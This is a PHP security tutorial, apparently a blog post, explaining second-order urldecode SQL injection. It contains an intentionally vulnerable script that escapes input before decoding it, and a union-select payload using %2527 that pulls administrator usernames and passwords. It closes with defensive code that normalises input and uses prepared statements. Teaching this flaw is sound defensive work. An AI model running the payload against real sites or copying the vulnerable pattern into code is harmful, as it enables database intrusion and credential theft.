Principle and defense of secondary urldecode injection

Principle of secondary urldecode injection


Most current web programs filter parameters, usually with addslashes(), mysql_real_escape_string(), mysql_escape_string() or by turning on GPC, to prevent injection. If urldecode() or rawurldecode() is then called somewhere on the already-escaped value, the parameter is decoded a second time, which can produce a single quote that the filter never saw and so trigger injection.

The code below gives a simple illustration.
<?php

$w = addslashes($_GET['id']);   // $_GET is already decoded once: %2527 arrived as %27, which holds no quote
$p = urldecode($w);             // second decode: %27 becomes ', a quote addslashes() never saw
echo '$w = '.$w.'<br />';
echo '$p = '.$p;

?>

We submit /1.php?id=1%2527. Because the submitted parameter contains no single quote, addslashes() changes nothing, and after the first decoding (%25 becoming %) the result is $w = 1%27. If the program then uses urldecode() or rawurldecode() on the id parameter, the result after decoding is $p = 1' and the single quote successfully triggers the injection.
Now that you understand the principle, exploitation is very simple.

Utilization of secondary urldecode injection

<?php

$conn = mysqli_connect('127.0.0.1', 'root', 'root', 'qingfeng');

$uid = addslashes($_GET['id']);   // the filter runs on the once-decoded value
$a   = urldecode($uid);           // the second decode re-creates the quote

$sql = "select * from news where id = '$a'";   // decoded value is spliced into the query
$result = mysqli_query($conn, $sql);
@$row = mysqli_fetch_row($result);             // @ hides the error if the query fails

echo ('当前SQL语句:'.$sql.'<br />结果:');
print_r($row);

?>

Open the web page to see the content (picture below).
From the principle above we already know that replacing a single quote with %2527 triggers the injection, so we use it directly here.
Closing the quote and commenting out the rest executes successfully, and from there a union query works just as in ordinary SQL injection:
id=1%2527 and 1=2 union select username, password from admin-a
The data is injected successfully: the administrator's account and password.

Defense against secondary urldecode injection

  1. Check incoming parameters in a loop before they are used for execution, and be cautious with externally submitted data.
  2. When fetching data from the database, do not simply trust the queried data either.
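As an added example, not code from the original post, here is the escape-then-decode pipeline beside a hardened lookup: the value is decoded until it stops changing, validated, and then bound as a prepared-statement parameter so it never enters the SQL string. The table news with a numeric id column and the connection details are assumptions.

```php
<?php
// Added example (not the original post's code). Assumes a MySQL table news(id INT, ...)
// and the placeholder connection shown at the bottom.

// The post's pipeline: escape first, then decode. The quote appears only after escaping.
function vulnerable_value(string $onceDecoded): string
{
    $escaped = addslashes($onceDecoded);   // "1%27" holds no quote, so nothing is escaped
    return urldecode($escaped);            // %27 becomes ', a quote addslashes() never saw
}

// Defense: normalise first. Decode until the value stops changing, so every hidden
// layer is exposed before any validation or escaping happens.
function normalise(string $value, int $maxRounds = 3): string
{
    for ($i = 0; $i < $maxRounds; $i++) {
        $decoded = urldecode($value);
        if ($decoded === $value) {
            return $value;                 // stable: no encoded characters remain
        }
        $value = $decoded;
    }
    throw new InvalidArgumentException('parameter is encoded too many times');
}

// Defense: validate the normalised value, then bind it instead of interpolating it.
function fetch_news(mysqli $conn, string $rawId): ?array
{
    $id = normalise($rawId);
    if (!ctype_digit($id)) {               // id is numeric here; anything else is rejected
        throw new InvalidArgumentException('id must be an integer');
    }
    $stmt = $conn->prepare('SELECT * FROM news WHERE id = ?');
    $stmt->bind_param('i', $id);           // bound as data, never spliced into the SQL text
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();   // get_result() needs the mysqlnd driver
    $stmt->close();
    return $row ?: null;
}

// Offline demonstration with the post's payload as PHP sees it after $_GET decoding.
$onceDecoded = '1%27';
printf("vulnerable: %s\n", vulnerable_value($onceDecoded));
printf("normalised: %s\n", normalise($onceDecoded));
printf("accepted:   %s\n", ctype_digit(normalise($onceDecoded)) ? 'yes' : 'no');
// With a real connection: fetch_news(mysqli_connect('127.0.0.1', 'user', 'pass', 'db'), $_GET['id']);
```

Applying addslashes() to the normalised value would also escape the quote correctly, which is the point: the filter has to run on the final decoded form, and a bound parameter removes the need to rely on escaping at all.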


Origin blog.csdn.net/p_utao/article/details/107189435